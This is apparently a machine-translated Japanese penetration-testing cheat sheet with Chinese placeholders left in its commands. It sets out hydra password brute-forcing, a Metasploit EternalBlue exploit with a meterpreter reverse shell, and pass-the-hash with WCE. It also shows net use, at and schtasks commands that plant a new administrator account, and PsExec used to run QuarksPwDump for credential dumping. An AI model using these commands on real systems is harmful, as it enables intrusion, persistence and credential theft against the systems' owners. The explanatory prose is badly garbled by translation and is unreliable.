ポートスキャン
共通ポートと攻撃
特定のスキャン方法ポートスキャンツールの使用を詳細に私の他の記事を、ジャンプするにはここをクリック
弱いパスワードをスキャン
弱いパスワードのスキャン、例えば、mysqlの、VNC、RDP、HTTPサービスにログインするために管理し、他の弱いパスワード、あなたがツールをスキャンし、弱いパスワードの一部を使用することができ、XSCAN、ヒドラ、クラゲ、nmapののように。あなたはまた、より多くの、より良いツールを自分自身を見つけることができます
悪弊
nmapのスキャン1.まず開いているポート
ヒドラ弱いパスワードの2.は、ポートスキャンをスキャンすることができます
hydra -L user.txt -P pass.txt 192.168.16.137(爆破的ip) smb(爆破的服务名)
-lユーザ名-Lパスワード辞書を爆破指定-P指定されたユーザ名-pパスワード辞書をブラストブラストブラスト指定された特定
nmapのスクリプト
NAMPのインストールディレクトリの下のスクリプト:スクリプトのパス
ブラストスクリプト:ブルート脆弱性検出スクリプト:vuln
使用
nmap -p 脚本正针对的端口 --script 脚本名 要攻击的ip
msfconsole
msfconsoleに入ります1
利用可能対応したスクリプトの脆弱性をチェックしてください。2.
search 17_010
いくつかの脆弱性スキャンスクリプトをチェックしてください。3.
use auxiliary/scanner/
4.ネットワークセグメントに指定されたスクリプトをスキャンする脆弱なマシン
use auxiliary/scanner/smb/smb_ms17_010
set threads 10
set rhosts 要扫描的网段/24
exploit
EXPを攻撃する脆弱適切なマシンを選択します5。
use exploit/windows/smb/ms17_010_eternalblue
set lhost 本机ip
set rhosts 要攻击的ip/32
set payload windows/x64/meterpreter/reverse_tcp
exploit
ハッシュ注入
原則
ハッシュ注入原理は、我々は良いハッシュを用意しているローカルまたはドメインのユーザーは、ターゲットマシンを取得するには、ログインIPC同じ時間の使用で、ローカルマシンにログインするかのようにされ、その結果、ターゲットマシンのローカル認証プロセスのLsass.exe行くに注入されます権威。ローカルまたはドメインユーザーのターゲットマシンのハッシュのために、それはNTLMハッシュをクラックすることができない人々に対処するために、あなた自身の想像力、自身注入ハッシュをプレイするために取得する方法
方法
1.最初の使用は、ネットワーク内のマシンのハッシュ値を取得WCE、および複雑すぎる壊すことができません
wce -l
使用方法2.原因は、多くの場合、ネットワークパスワードの多くのマシンが(同じパスワードのハッシュ値が同じである場合)と同じです
他のマシン3.が着陸にハッシュを取得しようと、着陸は、アカウントのパスワードの場合と同じにすることができます
ターゲット名またはドメイン名を取得します。1.
ping -a 目标机ip
2.着陸を使用してハッシュ値を取得する前に、何の代替はありません0利用可能ntlmhash
wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942
デフォルトでは、共有ファイルをCドライブターゲットマシンへ3.リモートアクセス
dir \\目标机ip\c$
ローカルマシンにマップされたターゲットプレート4 C
net use z: \\目标机ip\c$
リモート接続&実行手順
スケジュールされたタスクの追加
スケジュールされたタスクで
ご注意ください
ユースケース:ターゲットマシンアカウントのパスワードを取得しますが、リモートデスクトップ接続ができない
ニーズは、タスクスケジューラサービスを開くには
1.使用してIPC $のデフォルトでは、ターゲット・マシンへのリモート接続を共有しました
net use \\目标机ip /user:administrator 密码
目標時間を確認してください2。
net time \\目标机ip
スケジュールされたタスクの実行時に追加3
3.1ダイレクトコマンド実行
at \\目标机ip 时间 命令
例:
ユーザーを作成します。
at \\192.168.16.158 12:50 net user zs 123.com /add
Administratorsグループにユーザーを追加します。
at \\192.168.16.158 12:50 localgroup administrators zs /add
3.2スクリプトを使用して
batファイルを作成し、新しいユーザーを作成するためのコンテンツとのAdministratorsグループに追加します
ターゲットマシンバットにファイルをコピーします。
copy 1.bat \\目标机ip\c$\1.bat
このスクリプトを実行するようにスケジュールされたタスクの追加
at \\目标机ip 时间 脚本路径
4.すべてのタスクのリストでターゲットマシンを確認
at \\192.168.16.158
追加でschtasksスケジュールされたタスクの実行
なお、
ターゲットマシンアカウントのパスワードを取得するが、リモートデスクトップ接続できません:状況の使用を
あなたが使用する前に2003タスクスケジューラサービス後にシステムの電源をオンにする必要があります
1.新規ユーザーを作成し、Administratorsグループに追加するbatファイル、コンテンツを作成します。
2.使用してIPC $のデフォルトでは、ターゲット・マシンへのリモート接続を共有しました
net use \\目标机ip /user:administrator 密码
3.ターゲットマシンバットにファイルをコピーします。
copy 1.bat \\目标机ip\c$\1.bat
4.レビュー対象時間
net time \\目标机ip
次のコマンドでschtasksは、スケジュールされたタスクを追加入力します。5.
schtasks /create /tn aa /tr 脚本路径 /sc once /st 时间 /S 目标机ip /U 用户名 /P 密码 /RU system
プラス/ RUシステムも除去することができ、ユーザのシステムにより実行されると、スクリプトは、単一のパスコマンドで置き換えることができます
6.直接実施計画は、タスクの実行ではありません
schtasks /run /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码
7. [削除] [タスク
schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码
PSEXECリモート実行
1.ターゲットにローカル、リモートのアップロードソフトウェアを使用します
net use \\目标机ip\c$ /user:administrator 密码
copy wce.exe \\目标机ip\c$\
2.対象地域のプログラムを実行します
PsExec.exe \\目标机ip –accepteula -u 用户 -p 密码 执行的程序
最初の実行のボックスを再生されます、-accepteulaこのパラメータ缶バイパス入力してください
3. PSEXEC独自のローカルプログラムのパラメータがターゲットマシンにアップロードされ、自動的に実行された後に削除
Psexec.exe \\目标机ip -u 用户 -p 密码 -c QuarksPwDump.exe -d
-c <[パス]ファイル名>:リモートマシンと実行(ファイルが自動的に実行の終了後に削除されます。注)にファイルをコピーする
プログラムがフィニッシュに復帰するのを待っていません-d